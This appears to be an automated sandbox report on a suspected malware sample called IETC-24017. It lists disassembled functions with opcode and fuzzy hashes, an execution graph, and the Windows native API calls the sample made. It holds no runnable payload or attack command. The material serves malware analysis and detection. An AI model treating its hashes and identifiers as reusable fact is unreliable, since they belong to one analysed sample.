                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b921f7a42fb6488dcfbb4dbc29c2862e0eac2031fca2371c0efa7ac78955f92b
                                                                                                                                                  • Instruction ID: 0f93311af642276e36189d9e8e8ad1a974e091006e212312b4f12ece0865f1ce
                                                                                                                                                  • Opcode Fuzzy Hash: b921f7a42fb6488dcfbb4dbc29c2862e0eac2031fca2371c0efa7ac78955f92b
                                                                                                                                                  • Instruction Fuzzy Hash: 5CE10874E10259CFCB58DFA8C5819AEFBB2BF89314F24816AD414AB355D730A942CF64
                                                                                                                                                  Function 06ECACC8 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8ce2c03827df472b98a6501a8c9c1a79423c1cca0e3f63bfefe50f4f0e13ed33
                                                                                                                                                  • Instruction ID: 6fdb354e4c267042fb6fbbabc0d0e3b2acfa9e268034d1920abddd574482597f
                                                                                                                                                  • Opcode Fuzzy Hash: 8ce2c03827df472b98a6501a8c9c1a79423c1cca0e3f63bfefe50f4f0e13ed33
                                                                                                                                                  • Instruction Fuzzy Hash: 23E10774E10259CFCB54DFA8C5809AEFBB2BF88314F24C16AD418AB355D730A942CFA4
                                                                                                                                                  Function 06EC9A28 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b62d9470a8a1285c81c5893d0fe9345eb726f705fa8f959a181b4e9b86296b04
                                                                                                                                                  • Instruction ID: e321e2eeba884394ec4ef51a7349376d3859e9ee568c4df059ddd642f2876f14
                                                                                                                                                  • Opcode Fuzzy Hash: b62d9470a8a1285c81c5893d0fe9345eb726f705fa8f959a181b4e9b86296b04
                                                                                                                                                  • Instruction Fuzzy Hash: AEE1FB74E00259CFCB54DFA9C5809AEFBF2BF89314F24816AD514AB356D730A942CFA4
                                                                                                                                                  Function 06EC0559 Relevance: .3, Instructions: 267COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ba424d0fbba076f6c149036b36eafab0db5a21268baf2605bf97dcd84f45d053
                                                                                                                                                  • Instruction ID: f1df738454f3cb572b0092124ab2cbe2ac9247c52dcae941d5f2888b5a61a8b5
                                                                                                                                                  • Opcode Fuzzy Hash: ba424d0fbba076f6c149036b36eafab0db5a21268baf2605bf97dcd84f45d053
                                                                                                                                                  • Instruction Fuzzy Hash: FBD1E43192065ACACB10EB64D9907ADF7B1EF99300F50C79AE50937265EF70AAC4CF80
                                                                                                                                                  Function 025CD344 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683604408.00000000025C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025C0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_25c0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b1ebdfa3146d052118347252e060cfdd082b08fe83a143e66f32d0bca4195837
                                                                                                                                                  • Instruction ID: 894a96ea8235aecdb1de96c6be57a20217eb1c9928fd97c2d6f22d9f94e18cff
                                                                                                                                                  • Opcode Fuzzy Hash: b1ebdfa3146d052118347252e060cfdd082b08fe83a143e66f32d0bca4195837
                                                                                                                                                  • Instruction Fuzzy Hash: 7CA14D36E00205CFCF09DFA5C4405AEBBB3FF84314B25856EE906AB265EB71D956CB44
                                                                                                                                                  Function 06EC0560 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6966e7675fa7d251fe97d63c9832ac072f79fe457fe8fd04e63ad8e879a1b3c6
                                                                                                                                                  • Instruction ID: bef0773a17d1c5b5e37768c9db25033fb4500b2fca0b4e10807d182e7e42be25
                                                                                                                                                  • Opcode Fuzzy Hash: 6966e7675fa7d251fe97d63c9832ac072f79fe457fe8fd04e63ad8e879a1b3c6
                                                                                                                                                  • Instruction Fuzzy Hash: EED1E43192065ACACB10EB64D9907ADF7B1EF99300F50C79AE50937265EF70AAC4CF81
                                                                                                                                                  Function 04D10007 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1689843291.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_4d10000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 286d84b519811ed16e716f2d44891469710e719b64b6ddb039de3460bf662ce2
                                                                                                                                                  • Instruction ID: 6b9156a19ce3734a49c1ea1cdb5be7012c09775002a84feb78bb076e7344e40c
                                                                                                                                                  • Opcode Fuzzy Hash: 286d84b519811ed16e716f2d44891469710e719b64b6ddb039de3460bf662ce2
                                                                                                                                                  • Instruction Fuzzy Hash: 86C13BB1C81745CBDB19CF24E95818D3BB1BB8131CF904A09D2656F2E1EBB4166EEF48
                                                                                                                                                  Function 06ECB0F1 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 522629c884b64db07d508a071249f8400b25766702d9832063ddc8b7d1f0aa1d
                                                                                                                                                  • Instruction ID: c62c2ebf981060ce5240083da88f8a8e83628985e5042ac2bae56850a3e5cfc4
                                                                                                                                                  • Opcode Fuzzy Hash: 522629c884b64db07d508a071249f8400b25766702d9832063ddc8b7d1f0aa1d
                                                                                                                                                  • Instruction Fuzzy Hash: 6F512970E102198FDB58CFA9C9819AEBBB2FF89314F24C16AD418A7355D7309942CFA5
                                                                                                                                                  Function 06EC9A18 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 985ccde1183315d0e78aab767d598d339cd03b636e34ffca9990a124c31f4365
                                                                                                                                                  • Instruction ID: c153a263c2244c64528b54bac1ebe97df0fe2335ce12b5c9471e96301840f141
                                                                                                                                                  • Opcode Fuzzy Hash: 985ccde1183315d0e78aab767d598d339cd03b636e34ffca9990a124c31f4365
                                                                                                                                                  • Instruction Fuzzy Hash: 1D510C74E042199FCB54DFA9C9805AEFBF2FF89304F24C16AD418A7256D7309942CFA5
                                                                                                                                                  Function 06EC95ED Relevance: .1, Instructions: 128COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e86e2dbb28be9128fcc906300e5787943e717e585aaffa82dbbb687d5c016e1f
                                                                                                                                                  • Instruction ID: 65b25011b8d653351b72fd6ef116d1ca60f313930820c45625de21b2c267ec47
                                                                                                                                                  • Opcode Fuzzy Hash: e86e2dbb28be9128fcc906300e5787943e717e585aaffa82dbbb687d5c016e1f
                                                                                                                                                  • Instruction Fuzzy Hash: F2510C74E102198BCB58CFA9C5805AEFBF2BF89314F24C16AD418A7356D7309942CFA5

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:1.3%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:5%
                                                                                                                                                  Signature Coverage:7.9%
                                                                                                                                                  Total number of Nodes:139
                                                                                                                                                  Total number of Limit Nodes:8
                                                                                                                                                  execution_graph 90222 401b50 90223 401b55 90222->90223 90226 42ff93 90223->90226 90224 401bd1 90224->90224 90229 42e5d3 90226->90229 90230 42e5f9 90229->90230 90241 4073d3 90230->90241 90232 42e60f 90240 42e66b 90232->90240 90244 41b353 90232->90244 90234 42e62e 90237 42e643 90234->90237 90259 42cd43 90234->90259 90255 4284d3 90237->90255 90238 42e65d 90239 42cd43 ExitProcess 90238->90239 90239->90240 90240->90224 90262 416703 90241->90262 90243 4073e0 90243->90232 90245 41b37f 90244->90245 90273 41b243 90245->90273 90248 41b3c4 90251 41b3e0 90248->90251 90253 42c973 NtClose 90248->90253 90249 41b3ac 90250 41b3b7 90249->90250 90252 42c973 NtClose 90249->90252 90250->90234 90251->90234 90252->90250 90254 41b3d6 90253->90254 90254->90234 90256 428534 90255->90256 90258 428541 90256->90258 90284 4188a3 90256->90284 90258->90238 90260 42cd5d 90259->90260 90261 42cd6e ExitProcess 90260->90261 90261->90237 90263 41671d 90262->90263 90265 416736 90263->90265 90266 42d3d3 90263->90266 90265->90243 90268 42d3ed 90266->90268 90267 42d41c 90267->90265 90268->90267 90269 42bf93 LdrInitializeThunk 90268->90269 90270 42d479 90269->90270 90271 42ea23 RtlFreeHeap 90270->90271 90272 42d48f 90271->90272 90272->90265 90274 41b25d 90273->90274 90278 41b339 90273->90278 90279 42c033 90274->90279 90277 42c973 NtClose 90277->90278 90278->90248 90278->90249 90280 42c050 90279->90280 90283 18435c0 LdrInitializeThunk 90280->90283 90281 41b32d 90281->90277 90283->90281 90285 4188cd 90284->90285 90291 418dcb 90285->90291 90292 413f23 90285->90292 90287 4189f4 90288 42ea23 RtlFreeHeap 90287->90288 90287->90291 90289 418a0c 90288->90289 90290 42cd43 ExitProcess 90289->90290 90289->90291 90290->90291 90291->90258 90293 413f43 90292->90293 90295 413fac 90293->90295 90297 41b663 RtlFreeHeap LdrInitializeThunk 90293->90297 90295->90287 90296 413fa2 90296->90287 90297->90296 90144 42bf43 90145 42bf5d 90144->90145 90148 1842df0 LdrInitializeThunk 90145->90148 90146 42bf85 90148->90146 90149 424c43 90150 424c5f 90149->90150 90151 424c87 90150->90151 90152 424c9b 90150->90152 90153 42c973 NtClose 90151->90153 90159 42c973 90152->90159 90155 424c90 90153->90155 90156 424ca4 90162 42eb43 RtlAllocateHeap 90156->90162 90158 424caf 90160 42c990 90159->90160 90161 42c9a1 NtClose 90160->90161 90161->90156 90162->90158 90163 42fac3 90164 42fad3 90163->90164 90165 42fad9 90163->90165 90168 42eb03 90165->90168 90167 42faff 90171 42cca3 90168->90171 90170 42eb1e 90170->90167 90172 42ccc0 90171->90172 90173 42ccd1 RtlAllocateHeap 90172->90173 90173->90170 90298 424fd3 90302 424fec 90298->90302 90299 425034 90300 42ea23 RtlFreeHeap 90299->90300 90301 425044 90300->90301 90302->90299 90303 425074 90302->90303 90305 425079 90302->90305 90304 42ea23 RtlFreeHeap 90303->90304 90304->90305 90174 41b543 90175 41b587 90174->90175 90176 41b5a8 90175->90176 90177 42c973 NtClose 90175->90177 90177->90176 90178 41e743 90179 41e769 90178->90179 90183 41e860 90179->90183 90184 42fbf3 90179->90184 90181 41e7fe 90181->90183 90190 42bf93 90181->90190 90185 42fb63 90184->90185 90186 42fbc0 90185->90186 90187 42eb03 RtlAllocateHeap 90185->90187 90186->90181 90188 42fb9d 90187->90188 90194 42ea23 90188->90194 90191 42bfb0 90190->90191 90200 1842c0a 90191->90200 90192 42bfdc 90192->90183 90197 42ccf3 90194->90197 90196 42ea3c 90196->90186 90198 42cd10 90197->90198 90199 42cd21 RtlFreeHeap 90198->90199 90199->90196 90201 1842c11 90200->90201 90202 1842c1f LdrInitializeThunk 90200->90202 90201->90192 90202->90192 90203 413fc3 90204 413fe9 90203->90204 90206 414013 90204->90206 90207 413d43 LdrInitializeThunk 90204->90207 90207->90206 90208 4142a3 90209 4142aa 90208->90209 90214 417a33 90209->90214 90211 4142db 90212 414320 90211->90212 90213 41430f PostThreadMessageW 90211->90213 90213->90212 90215 417a57 90214->90215 90216 417a93 LdrLoadDll 90215->90216 90217 417a5e 90215->90217 90216->90217 90217->90211 90218 1842b60 LdrInitializeThunk 90219 418fe8 90220 42c973 NtClose 90219->90220 90221 418ff2 90220->90221 90306 413d7c 90307 413d50 90306->90307 90310 42cc03 90307->90310 90311 42cc1d 90310->90311 90314 1842c70 LdrInitializeThunk 90311->90314 90312 413d65 90314->90312

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 00417A33 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 174 417a33-417a5c call 42f603 177 417a62-417a70 call 42fc03 174->177 178 417a5e-417a61 174->178 181 417a80-417a91 call 42e0a3 177->181 182 417a72-417a7d call 42fea3 177->182 187 417a93-417aa7 LdrLoadDll 181->187 188 417aaa-417aad 181->188 182->181 187->188
                                                                                                                                                  APIs
                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AA5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1821676970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_IETC-24017.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Load
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                  • Opcode ID: b1e2df55a2c126aa683e530d14aa88b5271a26aa179889d84a5fff493b91d125
                                                                                                                                                  • Instruction ID: edc8bb18df28eb5cc2c6d1144414f850cb5cd21e2a76fd2636645ae9ff713134
                                                                                                                                                  • Opcode Fuzzy Hash: b1e2df55a2c126aa683e530d14aa88b5271a26aa179889d84a5fff493b91d125
                                                                                                                                                  • Instruction Fuzzy Hash: B60152B1E4410DABDB10DAA1DC42FDEB3B8AF54308F4041AAED0897240F635EB498755
                                                                                                                                                  Function 0042C973 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 199 42c973-42c9af call 404753 call 42dbb3 NtClose
                                                                                                                                                  APIs
                                                                                                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C9AA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1821676970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_IETC-24017.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                  • Opcode ID: 0ba32a543dd1fd00c3caab382bf79cfb2a445aba8da39963bcad958ac1c65b2d
                                                                                                                                                  • Instruction ID: 1d297846c50a40377a1e4f05da17908f599e079ef5721f1fc2958649e5994738
                                                                                                                                                  • Opcode Fuzzy Hash: 0ba32a543dd1fd00c3caab382bf79cfb2a445aba8da39963bcad958ac1c65b2d
                                                                                                                                                  • Instruction Fuzzy Hash: 68E04F762402147BD210FA5ADC41F97776CDFC6714F014419FB48AB241C7B0790187F5
                                                                                                                                                  Function 01842B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 213 1842b60-1842b6c LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: b0b8f7233550a816782e492171b6ab3682f98508527dad5c61f4e736bfa5af8f
                                                                                                                                                  • Instruction ID: 708da6853d7115dd6ae460148a3fd5828274f3b1612557eb572eb884a2dded46
                                                                                                                                                  • Opcode Fuzzy Hash: b0b8f7233550a816782e492171b6ab3682f98508527dad5c61f4e736bfa5af8f
                                                                                                                                                  • Instruction Fuzzy Hash: 1990026120240007424671594414616440AD7E1301B55C022F6018590DC5258A956626
                                                                                                                                                  Function 01842DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 215 1842df0-1842dfc LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: b4babc0dda2c32d0690a01d11e195e946cbb70180919b812413d3967ef09ca47
                                                                                                                                                  • Instruction ID: 8b2a465b3071ceb2ca8f11c589425ca2738e131e162cb431cd8e2105e6e03cb1
                                                                                                                                                  • Opcode Fuzzy Hash: b4babc0dda2c32d0690a01d11e195e946cbb70180919b812413d3967ef09ca47
                                                                                                                                                  • Instruction Fuzzy Hash: FF90023120140417D252715945047070409D7D1341F95C413B5428558DD6568B56A622
                                                                                                                                                  Function 01842C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 214 1842c70-1842c7c LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 4ab85d995be18ed019a04890b2293aed6f0776c443f044f717fdd0ab4aa2b9ea
                                                                                                                                                  • Instruction ID: 81c19f638b1a6f09e02ea30b66326b995be5007b2a54d46542b911e8a6f9f34d
                                                                                                                                                  • Opcode Fuzzy Hash: 4ab85d995be18ed019a04890b2293aed6f0776c443f044f717fdd0ab4aa2b9ea
                                                                                                                                                  • Instruction Fuzzy Hash: 6090023120148806D2517159840474A0405D7D1301F59C412B9428658DC6958A957622
                                                                                                                                                  Function 018435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 216 18435c0-18435cc LdrInitializeThunk
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 424219e912077ed206fbb0fdb1a21be53436261c013fb698d379eabe1c341fcc
                                                                                                                                                  • Instruction ID: 117b82ad7d38cf1d61cb8c5dbec7175b0790706f6d6352d20b33bb99b9478477
                                                                                                                                                  • Opcode Fuzzy Hash: 424219e912077ed206fbb0fdb1a21be53436261c013fb698d379eabe1c341fcc
                                                                                                                                                  • Instruction Fuzzy Hash: DC90023160550406D241715945147061405D7D1301F65C412B5428568DC7958B556AA3
                                                                                                                                                  Function 004141D9 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 154COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1821676970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_IETC-24017.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ($_22L-I54$_22L-I54
                                                                                                                                                  • API String ID: 0-570299777
                                                                                                                                                  • Opcode ID: feec4cbb6fcddf9a58309d51ac2fe57f97268f3be8edff7979059fcbcc6b8a3c
                                                                                                                                                  • Instruction ID: 5abe55a105b1778a5c3e139171f837767a9d9c9a68df2126b980d86da55ab75b
                                                                                                                                                  • Opcode Fuzzy Hash: feec4cbb6fcddf9a58309d51ac2fe57f97268f3be8edff7979059fcbcc6b8a3c
                                                                                                                                                  • Instruction Fuzzy Hash: BF410F7294521C7BC710DE548C81AEF7BACEF86364B4442A9FD949B342D53889478791
                                                                                                                                                  Function 004142A3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • PostThreadMessageW.USER32(_22L-I54,00000111,00000000,00000000), ref: 0041431A
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1821676970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_IETC-24017.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                  • String ID: _22L-I54$_22L-I54
                                                                                                                                                  • API String ID: 1836367815-1272064500
                                                                                                                                                  • Opcode ID: 1d32f873231ee0cf7c9e0f008ffe1ad72f1a55fd67ac33a62de5a939c39a0aae
                                                                                                                                                  • Instruction ID: 2479df91b66091b4cc7dc107cb1b3ee8cee4f9f266f1b8a79b790abe79587009
                                                                                                                                                  • Opcode Fuzzy Hash: 1d32f873231ee0cf7c9e0f008ffe1ad72f1a55fd67ac33a62de5a939c39a0aae
                                                                                                                                                  • Instruction Fuzzy Hash: 9101C4B1E4021C7ADB11AAE19C82DEF7B7CDF80798F448069FA14A7241D6784E0647A5
                                                                                                                                                  Function 0042CCF3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 194 42ccf3-42cd37 call 404753 call 42dbb3 RtlFreeHeap
                                                                                                                                                  APIs
                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,CBC1F08B,00000007,00000000,00000004,00000000,004172B8,000000F4), ref: 0042CD32
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1821676970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_IETC-24017.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                  • Opcode ID: 32c6bd681a8d2f812b8a5a5ca8e219b681fbdb766c81b2f034a6e588bc96f94e
                                                                                                                                                  • Instruction ID: c07817feb50869cc0fb858181412f9f4ffcac6bf3a9f9fba7268dd19a21886c1
                                                                                                                                                  • Opcode Fuzzy Hash: 32c6bd681a8d2f812b8a5a5ca8e219b681fbdb766c81b2f034a6e588bc96f94e
                                                                                                                                                  • Instruction Fuzzy Hash: 4BE06D752042087BD614EE59EC41FAB37ACEFC9714F004419FA18A7242D670B9108BB5
                                                                                                                                                  Function 0042CCA3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 189 42cca3-42cce7 call 404753 call 42dbb3 RtlAllocateHeap
                                                                                                                                                  APIs
                                                                                                                                                  • RtlAllocateHeap.NTDLL(?,0041E7FE,?,?,00000000,?,0041E7FE,?,?,?), ref: 0042CCE2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1821676970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_IETC-24017.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                  • Opcode ID: a1630f8b6edca733148e3f098872d0a180684821db085e9ee2b0bfce84497063
                                                                                                                                                  • Instruction ID: da7eeae0f92f25b97cd2c20f5fcaf5f2b0145350ac3edf4dc95d21e055d9c126
                                                                                                                                                  • Opcode Fuzzy Hash: a1630f8b6edca733148e3f098872d0a180684821db085e9ee2b0bfce84497063
                                                                                                                                                  • Instruction Fuzzy Hash: B2E06D762002047BD610EF59DC45F9B37ACEFC9714F00441AFE08A7241D670B9108BB9
